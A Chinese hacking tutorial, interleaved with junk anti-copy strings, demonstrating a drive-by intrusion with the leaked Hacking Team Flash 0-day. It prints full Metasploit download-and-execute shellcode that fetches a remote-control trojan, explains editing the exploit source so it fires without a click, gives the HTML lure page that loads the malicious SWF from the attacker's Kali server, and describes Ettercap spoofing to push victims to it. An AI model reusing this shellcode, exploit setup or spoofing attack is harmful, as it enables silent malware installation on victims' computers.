|
+ F8 @ I; Q, H) n: D- I
三、flash 0day之手工代码修改制作下载者实例入侵演示
: X1 v9 G$ S4 x6 e 2 ]( y9 @4 v) t' R8 J: d
% I4 u& y7 A) T 利用到的工具: # J: ^/ f$ c8 h
% | l K' @. I4 S
/ g1 B" O: k5 p" P1 B+ Z Msf
" ~- g4 V% ~# }+ t, S! i6 x$ X 9 H* A1 E- c! S
( h& R! v2 B! q1 u6 r& [
Ettercap
. v; ~* b1 Z6 X! a9 k1 {' e
% {4 J! f. x5 n9 H( ]9 s& G+ `, X7 x6 |0 J
Adobe Flash CS6 Q& d5 a; X4 o0 k* l3 q2 W
! m4 q4 i( o0 K9 l2 ~1 `$ w: D
/ p; j4 R f9 [' j Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 & c4 J: M! U/ w
" v2 K/ T) }* t% A' Z, {' }- n( Y
- D+ I+ p4 s# b7 i R; N5 o 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 0 [9 x4 \4 m: g3 z s+ o
8 S8 q9 ]3 ?$ s2 f& H# i
4 v- b( g. f$ v6 b9 K 如图: $ A9 T1 p2 ]. G6 O1 I8 T0 D
. z7 t' B2 f2 ?2 F
/ S/ A; p. ~! q* \1 O1 A) C
+ L4 D6 s# J/ n1 q 8 b* ~- j. ]7 L8 y4 P3 ?/ p; y& Y
3 {' o& {# f) V: d
1 `( n2 O8 ^1 x: n( N5 a
$ K* i- }* u& Q% p( r& _5 h" |/ K/ A, { c: c1 n
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
" ]% h' U/ A* C2 H2 \. [
" j4 Z/ g3 A: o3 c4 L$ a1 b3 b+ `: y+ [2 s- b1 T2 g3 a
4 H% I! v. q/ H: C) ?! N
9 }( k- p* i" H8 I0 `
7 Q. e2 v6 |* V ~
9 p# u5 y( T0 P( V' u 9 x: y p5 |: K9 p1 h
9 P# ^: N4 N& u$ z+ M
然后执行generate -t dword生成shellcode,如下:
( C; Y% @6 M, _9 |# j' \; J: e
1 h# K- q$ [ D; F3 h9 |( Z$ L# C: H( m- @
& E& A( N) x3 _9 S# i" U8 Z# m
A% ]* b' L6 g" Q" B: W5 D
; u) O# t9 {* |- L7 x( c 复制代码到文本下便于我们一会编辑flash exp,如下:
' C4 C5 O# ~. g8 j 9 _' @% V* S3 b$ |
6 f) A, ?/ k+ A+ ~3 v0 Q+ J
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, / t% V2 E2 X6 y0 I' {( E
/ Y: @( ?* _; V
$ m! n [/ \ W/ E* E 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, + Q' P; m- f) G6 k, T0 [2 A
, ~- Y I0 z/ `$ G. \
' K9 X0 f" p7 i/ h9 c' R 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) Q& ~2 F$ [7 |: |4 ]. W) L
2 h! m4 m& E# i1 a; R" f% l6 }3 V* g) o
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
Z) W2 y0 J# e' M
# E% |% g2 t ?4 D! ?
0 }/ W6 d: ~( H0 F6 y4 _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
; G! X; X, T/ I6 P / q& r k0 y, I" Z. k
2 N. o, D; P3 b3 D& p6 l
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
?) K0 C" n! K Y" v4 X
2 r! U7 ?# ^' V' \- T$ m1 |1 @3 W0 S7 o; _; W' D0 t6 Z
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
5 O; D0 k4 g3 Z* h b+ k* u6 |4 z7 G ; q! T: L. c9 p' c
4 d+ S% ?! d5 ^- j( O" [; u3 u3 p
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, " z" _: F2 {$ F0 A
; s/ B9 h+ E L
' }. w: _& z, k
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / R M s8 \- n; l
0 a* x0 a3 C, S7 s. f. x) }
' ` @1 d0 |) u7 ~9 x
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
+ y+ W; i) w1 f0 p% }. Z& v$ U % g' T P. U: r( l
2 a% ?" ~: m. W6 F* s 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, $ c, C' Y- _. _( y# f
& A; E# I. y8 M" \7 A- s( a6 g
! L/ Y' g ]7 s [' h, Y [3 c" u
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , W" O; F* z9 p2 |/ f0 H
; i6 l! @5 b. u! H0 V& G' }
4 } ]4 L' I+ o& Y6 ^2 h 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
/ C4 `0 B4 l( V5 D* i8 K / p6 M# \( \' T- X
% `, a# a7 [! [9 V6 l
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
+ t$ O# r5 K: \/ O + e* R: ?% |+ U9 n: E
9 v3 R* ~- \9 |1 L1 @$ P& R8 K5 ]) p9 [) N
! F0 r4 ~5 d( o3 O: v5 r
( N' \" s0 y7 w$ \: m5 S: v
: c$ X: l8 [: I1 b% o, F9 Y8 N- k4 k5 R: F 2 K: J/ z. l# i0 t( w
2 I/ a3 P5 x4 \! M# K2 b
2 j$ M) e; B# j% [/ z5 m# @ 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
4 O5 k* X; T) h+ l2 P% [! q( [ F% a% {! a& h! s1 a" z& K
; O9 F/ v3 W* a4 ~+ Q
! x5 L8 P' e/ {: O9 t
% W7 U) @; Z& Z2 w- r0 C9 \
2 y5 O \+ K K( L6 ] 先修改ShellWin32.as,部分源代码如图:
) `" a4 R1 y n6 D, i4 J, c! i
- Z+ C7 z- K. v* p# t. V
5 p. b e* g' \
! v6 j1 J6 j# W1 R: ^6 o! a# ?3 ^& p
3 v7 r- A C* ?! A# f1 x
8 k& M4 W5 I6 _, l8 ^' i 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
* S4 O* d+ a& a2 ]3 u" @
/ x5 `( C! C) o2 x3 k3 N4 t6 d; `% O; X0 }$ U: n
, C! k, f7 b( Q+ r; y' m' W1 c
8 A3 p4 V- f. J5 \2 v. I) ~: B9 z s$ {
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
* ~+ @/ P) } ~: z. f: b
$ K- J0 Y4 [2 w) e, F \
+ g. k) M! a* G4 U! V
% H6 K9 Q# S( y# z' Q - \4 Z/ p4 l: \7 H
* \$ x. B, u* ~3 }! c; \- k
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 I0 W! S' u' f( D; K" a8 N8 _ V
% k1 N1 d7 G, m, M, K, z. S9 [, K) M$ }
& |/ h" _# |- Z$ r' _! S$ |
0 c2 R- x: q3 i6 i3 J4 D0 `; A
$ r6 I) R4 `: ^3 n
. v! e8 K4 w: k# z3 i
! _( G: o- |# ?
1 o, l/ A' o' `6 I' Q. \
# G$ Q: K8 n9 F" [- |9 t
6 V" G, U: j8 a' N! W6 G0 i: I$ A @+ g L
然后点保存,下面我们来编译一下,打开
; G3 K% a0 x$ u1 \1 s
$ k! t7 U! }! O, g, p+ |- A5 D+ o& |6 ]. D! `. Y, W
exp1.fla然后点文件-发布,看看编译没错误
) S, ^2 [& q F9 b
3 w9 B: F6 B, j* @ v
4 e9 N' p" k/ m5 V % P1 |7 g9 B% H) E. L2 j- g
) m j+ B# S3 A1 l! g8 B, B7 l5 N2 q+ T7 \7 L7 G
- Q9 [; l* X, ?1 m8 J# U, [
9 a6 j5 c. _- t+ f2 ^" m
5 U R9 _: {7 W
1 Q! ?% ?: {9 \
+ R. Y3 M3 L* `- \7 y% _2 ?' m
3 u6 N# r/ x5 _& P; v# ^/ @( v
v. P. H" ?5 G4 X t2 }- t) ^- x
* X1 Q8 ~; A+ y0 N% ?5 j$ O5 C# h* D! a, _
然后我们把生成的
- x$ S9 A Z6 s/ p/ C& a : R1 V6 A) A- A2 q0 x& g
, x2 z0 N, j6 j9 \/ F4 d exp1.swf丢到kailinux 的/var/www/html下: 6 l7 q3 p% R" y; [% N
( O2 y; m5 F) S% W% D. ] r
4 D5 X( N/ N3 m ?% U' r ` 然后把这段代码好好编辑一下
6 g; z/ i9 H7 t0 h5 K5 [ 5 N s7 D7 h* e( x* d8 T1 ?
+ P5 w% k. E2 ~, Q* r& H0 P
, b% S6 ~- k1 G; @
`+ H& R+ r4 P# c, `& |
- t( q9 ~/ D* c2 N( |
' q3 q# \0 {( C 6 |5 [0 `! ^; P: I
c& Z8 |" v' f, `/ `3 `& a
/ _9 z0 ~6 s* d) T& d
# z+ t% J3 a7 X! r1 h8 t4 U& X4 H* F) p* I& h" a7 j N1 ]* a
' p0 p- i; ~: S' @9 l: I
* K7 s5 Y% x2 T* q7 H% ^
- q% Q' S3 N6 m$ _" g
' F, ?5 [* z: ?4 |
2 o4 l& }7 b% v5 F, E2 E/ o6 @
! T# B$ V4 g! \5 q0 u
) p8 D* ?0 h7 O1 K4 p8 b& ^' v! V * L! p6 f8 K0 Z0 a4 b
# [7 A5 E( p1 Q( u
<!DOCTYPE html>
8 }2 d. S: G! c- ~4 c4 Q# W
: y* `! t, {6 H1 g% N* Q& T* S& \, _$ ~- ?
<html>
$ L2 l) z/ H3 F / _7 f2 w% ^6 _. A, ?) N
4 |; ?3 H4 R: R# y* s3 W
<head>
! _1 o) ^# r5 s, A9 g* m% | , g& [) w; Z0 @/ n- s+ f
: ]9 b9 J2 F. c$ A
<meta http-equiv="Content-Type" content="text/html;
a* @( W. b4 L" t
+ p9 W7 R4 K( q! C! _* F8 @ B- Q& O: F7 A
charset=utf-8"/>
: x7 _! I* r" {4 ^1 C0 u+ v
S* _* P2 `7 D7 M: b! N" Q( w4 I7 @% X- u3 I
</head> & }6 Y' L; Z9 }. ?/ g; Z4 e
; K. B) b8 ?# x) t" `! b7 P/ r) j4 \: [$ i
<body>
K9 q3 x; ]% ?' l! E1 h- N h
( J) f2 m2 l, A3 O6 j, ~# U
- Q! E* a7 [' @6 S t. {/ }( ^. c1 L. z <h2> Please wait, the requested page is loading...</h2>
/ [1 t% I: W. A' ^# n
3 V6 ?1 L, Z2 F* d' R9 M i* Z2 h
- X% k. {/ t9 d B5 ] <br> ; f0 b; N4 B6 B* l. T
$ v& h- e1 {0 U# x+ ]8 [9 B3 v- n
T! N8 @2 h# N; h0 \ <OBJECT
* K+ K/ b8 p7 e, I0 S1 X+ j( s - h. T$ r7 r$ r, E' I' ^
* M4 N3 `2 x t) x d8 _2 ] classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie : F% a. U- d" V* j0 R
2 r+ D7 |( z$ {
. i9 R1 X4 g9 g( Y* l- L; o5 k
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
' L ]! W9 `- P$ {! y% D 4 K& b# J! w. a1 \% N/ |7 \
* G2 K! G4 e& @/ Q
</body> . g. j3 p4 g9 I) X$ C
: D4 G; I& V( c: Z7 m1 ^
* K. ?4 X x2 [! P# X <script>
3 N/ `* ~8 B: H) U8 y ! {" d. m$ o# J4 ~7 B. [
$ j6 Y, d0 P+ y
setTimeout(function () {
3 ?2 e; W8 p( R4 l; Y( Q# K
8 x' X! L1 |9 A9 ~4 T
( w5 C2 y ]5 R 8 s$ T3 E w- i; l
& s( U6 B5 T- a0 f& ]; m+ O0 F( K
window.location.reload(); / N( a# K/ \# L% U! b' Q
# b, V+ h% ?! b- a
- R' j- a5 c. p" L+ x5 Y }, 10000);
3 `7 Z I$ j9 O0 U5 ~ 4 v( w4 @, f8 n
0 Z0 A# Y! U6 e$ |( }* N5 q' P ~
3 l- }+ r+ m' f7 e* K
- @& ~* y5 X, r
5 Y' l# l& E. C( P& R* Q </script> # i6 {1 X4 U6 f- o
) i- ^- A. x6 y
0 ]3 Z: l( D$ \+ E$ j! n4 G7 L. @ O
</html> : k9 C4 H+ x4 S# i% [; c$ J
& D+ [# p& `% @# \
$ n2 I6 Z& w4 z' x0 t
5 H# u2 F( @8 h8 O( Z: C
+ I! Q* t6 [$ J) w7 V
5 g* r& a( U( P4 W4 f, e 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
1 V* e+ {7 f; K: ^; |4 y( c6 C2 P
3 h# I# L8 _+ F" ^# `5 r9 M( H: u0 a( G z1 y- s0 n; j; }
& D1 W& I |4 O! {, S6 A; k9 y * y4 z) d$ Z6 v2 W
, w! h1 v9 @0 u6 M- e6 N) o 0 F6 J/ M5 T4 v0 Q" j5 j
) r" [" q3 ^5 X, r e4 Q
* P" a7 @1 x2 J4 r0 Q
! h0 ]* r7 J1 {$ R. r: j # B( G* }8 l$ Y) U' D0 m4 C
- X& S) R+ I0 C9 W* s 8 \0 d6 n) ~0 U e* q1 u
2 P6 c1 B/ t, F0 ^5 [$ [
$ w. {0 n# X6 g Q& b- q2 R
1 Z# i8 c! y+ n% ^6 m& z: T
}" o+ V4 `8 z$ W s
* R, S( U" R' B2 c 下面我们用ettercap欺骗如图: 6 T l( a" x9 T7 \# l; C& ~+ f
5 Q: _5 b) V% |# n3 R- a, S. l
. g: q' |) U8 z/ G) T! m
3 t4 l. N+ G+ F$ m
) Y! X$ o3 j/ a4 o. f2 L) g, D8 N
1 C% k: L$ _% }& M. ]& ~" S) P+ F ^ # O! Y0 p- m1 R% s
; e* ^, Q$ m m" m% A7 g' T G1 o! H& F) L; {
下面我们随便访问个网站看看: + s9 I! e( w) [9 z2 Q
5 {% y' k# E8 w7 q
2 D. t& Z; K4 S/ N. A4 Z, |4 h 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: & C9 S2 V- k4 {* R4 u1 T
8 U: c. \( k5 z7 q. q. R W2 V) w* U' `6 ~- U
5 q+ @+ A2 X. S2 {1 E2 G" J! v 3 a2 a) D1 Z6 b1 b& U" g G" L
4 W" p0 x, _% h
我们看另一台,
3 O2 }& P6 W/ E/ Z% m+ E8 x0 Y - ~+ d; A2 b2 ^! D) C
4 e% \$ a! g4 j2 \. |9 T& i 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
, @; K: D" p" N' O8 s! |8 X |